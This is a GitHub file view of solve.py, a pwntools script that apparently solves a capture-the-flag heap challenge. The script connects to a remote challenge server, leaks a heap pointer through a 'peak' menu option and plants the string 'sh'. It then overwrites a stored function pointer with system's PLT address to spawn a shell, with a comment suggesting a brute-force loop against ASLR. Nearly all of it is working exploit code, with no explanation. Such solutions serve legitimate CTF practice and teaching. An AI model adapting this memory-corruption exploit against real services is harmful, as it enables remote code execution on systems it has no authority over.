-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathsolve.py
61 lines (47 loc) · 1.26 KB
/
solve.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
from pwn import *
def add(sz, content, price):
if len(content) < sz:
content += b"\n"
io.sendlineafter(b"> ", b"1")
io.sendlineafter(b"Length: ", str(sz).encode())
io.sendafter(b"Content: ", content)
io.sendlineafter(b"Price: ", str(price).encode())
def peak():
io.sendlineafter(b"> ", b"2")
def pop():
io.sendlineafter(b"> ", b"3")
def free():
io.sendlineafter(b"> ", b"4")
MAX_NODES = 64
TREE_SIZE = MAX_NODES * 8 + 8 + 8
# context.log_level = "debug"
context.terminal = ["tmux", "splitw", "-h"]
context.arch = "amd64"
elf = ELF("./main")
# io = process("./main")
# io = gdb.debug("./main", "c", aslr=False)
io = remote("ictf2.maple3142.net", 1225)
free()
add(TREE_SIZE, b"peko", 0)
peak()
io.recvuntil(b"Content: ")
present_addr = int.from_bytes(io.recvn(6), "little")
print(f"{present_addr = :#x}")
add(2, b"sh", 0)
sh_addr = present_addr + 0x20 + 0x20
print(f"{sh_addr = :#x}")
system = elf.plt["system"]
print(f"{system = :#x}")
payload = flat(
{
0: sh_addr,
MAX_NODES * 8: 10,
MAX_NODES * 8 + 8: system + 0x4000, # 1/16 success, 0x4000 is for aslr off
}
)[:-6]
assert len(payload) == TREE_SIZE - 6
free()
add(TREE_SIZE - 6, payload, 0)
pop()
io.interactive()
# while true; do python solve.py; done